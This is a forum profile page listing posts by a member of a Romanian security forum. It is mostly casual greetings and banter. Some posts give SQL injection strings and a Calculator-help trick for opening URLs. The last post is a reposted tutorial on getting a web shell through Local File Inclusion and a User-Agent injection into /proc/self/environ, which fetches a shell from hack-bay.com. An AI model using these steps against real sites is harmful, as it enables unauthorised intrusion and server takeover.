Jump to content

ZeroCold

Active Members
  • Posts

    1376
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by ZeroCold

  1. ZeroCold

    Salut!

    f137692d79e146a6f0947e87495ee281
  2. SELECT username FROM users WHERE username=addslashes($username) AND password=addslashes(' OR 1=1 OR ') :D:D
  3. bun tutorialu... Vroiai cont premium :D:D ?
  4. SELECT username FROM admin WHERE username='$username' AND password='$password' -- ???(nus sigur ) )...
  5. welcome to rst! ....esti blonda???
  6. poate vrea celalat sa il ia.....in excursie
  7. MJ ghost man....mj ghost.....
  8. ZeroCold

    salut

    salutare! Bun venit!
  9. ZeroCold

    :)

    aia are fata de bufnita ma nu de pisoi... buhuhuuuu (asa face cand o calaresti
  10. yo man ! Welcome to rst!
  11. luv america!!! da na ce sa-i faci...romania: trebuie sa acceptam realitatea
  12. :O:O nu conteaza...., zi u ce fete si la ce liceu invata (da pm)
  13. pff 5....ce aproape am fost ... nu dai si punct din oficiu ma??? ca sa se faca 6 ???
  14. TinKode direct din coltul isrului ).... tare ma....l-ai luat pe gutza.....daca te aude 50 cent ii cade fata
  15. Dada....RST Center= Romanian Security Translaters Center
  16. ZeroCold

    Salut

    s-au luat toti dupa mine :D:D Scz de off
  17. un tovaras zero :D:D Welcome to rst man!
  18. Mai este cineva din tg neamt sau sunt singurul??
  19. ZeroCold

    Cel mai ...

    Cel mai prost (noob) : Google Translater Cel mai inteligent (1337) : Bill Gates Cel mai popular user : Nemessys,Nytro,Tinkode,Fitty, Begood, si Mosh pax :D:D Cel mai certaret user : poznasha ))))) Cel mai "offtopic" user : aici nus Cel mai nesuferit user : nici unu ( pt mn )
  20. ma bag si eo buna ideea )) ( cred ca ar fi buna daca ar fi la general, adica in loc de testul cu broastele, un print cu carnetu de note :D:D)
  21. ZeroCold

    :)

    Neme, tu i-ai facut poza acolo ma??? Ce gagica buna ti-ai tras...n-am ce zice...Felicitari! :D:D
  22. Tutorial facut de mine :D:D sa nu ziceti iar ca nu-i bun ca ma supar Pasul 1: Deschidem calculatorul: Start->all programs->accesories->calculator Pasul 2: Dupa ce am deschis calculatorul deschidem fereastra HELP ( apasam F1) Pasul 3: Dam click dreapta pe semnul intrebarii din partea stanga sus, apoi dam "jump tu url" (cum vedeti in imagiea de la pasul 2 ). Introducem adresa... Pasul 4: Voilla!!! :D:D sper ca v-a placut
  23. pe ala nu l-am vazut, da oricum se observa mai asta de aici. si...da, e facut de sirgod, am pus las sfarsit autor si sursa
  24. S-au ales toate 1. justin 2. Ellimist 3. hate4all 4. demon_zone 5. fLr^ 6. ZeroCold 7. v1c 8. CyberWolf08 9. whistler 10. Chipsuletz 11. Flubber 12. mihaim1980 13. Necrolyte 14. SympleBoy22 15. YuliK 16. RipKid 17. eXcEssz0r 18. LiviuCool 19. blueangelmnx 20. HackKing si :D:D 21. ROFL (in caz ca da eroare programelu )
  25. Shell prin LFI - metoda proc/self/environ 1 - Introducere 2 - Descoperire LFI 3 - Verificam daca proc/self/environ e accesibil 4 - Injectare cod malitios 5 - Acces la shell 6 - Multumiri >> 1 - Introducere In acestu tutorial va voi arata cum sa obtineti un shell pe un site folosindu-va de Local File Inclusion si injectand cod malitios in proc/self/environ.Este un tutorial care explica totul pas cu pas. >> 2 - Descoperire LFI - Acum sa gasim o un site vulnerabil la Local File Inclusion.Am gasit tinta,sa verificam www.website.com/view.php?page=contact.php - Acum sa inlocuim contact.php cu ../ si URL-ul va devenii www.website.com/view.php?page=../ si avem o eroare. line 1337 sanse mari sa avem o vulnerabilitate de tip Local File Inclusion.Sa trecem mai departe. - Sa verificam daca putem accesa etc/passwd ca sa vedem daca este vulnerabil la Local File Inclusion.Sa face un request : www.website.com/view.php?page=../../../etc/passwd avem o eroare si fisierul etc/passwd nu este inclus. 1337 urcam cateva directorii www.website.com/view.php?page=../../../../../etc/passwd am inclus cu succes fisierul etc/passwd. >> 3 - Verificam daca proc/self/environ e accesibil - Acum sa vedem daca proc/self/environ este accesibil.O sa inlocuim etc/passwd cu proc/self/environ www.website.com/view.php?page=../../../...lf/environ Daca primiti ceva de genul proc/self/environ este accesibil.Daca primiti o pagina alba,o eroare inseamna ca nu este accesibil sau sistemul de operare este FreeBSD. >> 4 - Injectare cod malitios - Acum sa injectam codul nostru malitios in proc/self/environ.Cum putem face asta?Injectam codul in HTTP Header-ul User-Agent. Folositi addon-ul Tamper Data pentru Firefox pentru a schimba User-Agent-ul.Porniti Tamper Data si faceti un request la URL-ul : www.website.com/view.php?page=../../../ ... lf/environ Alegeti Tamper si in campul User-Agent scrieti urmatorul cod : Apoi dati submit la request. Comanda noastra va fi executata(o sa descarce un shell txt de la adresa http://hack-bay.com/Shells/gny.txt]hack-bay.com si il va salva ca shell.php in directorul site-ului) prin intermediul functiei system(),si shell-ul nostru va fi creat.Daca nu merge,incercati exec() pentru ca system() poate fi restrictionat pe server din php.ini >> 5 - Acces la shell - Acuma sa verificam daca codul nostru malitios a fost injectat cu succes.Sa vedem daca shell-ul este prezent. www.website.com/shell.php Shell-ul nostru este acolo.Injectia a fost efectuata cu succes. Sursa: insecurity.ro ; Author: SirGod
×
×
  • Create New...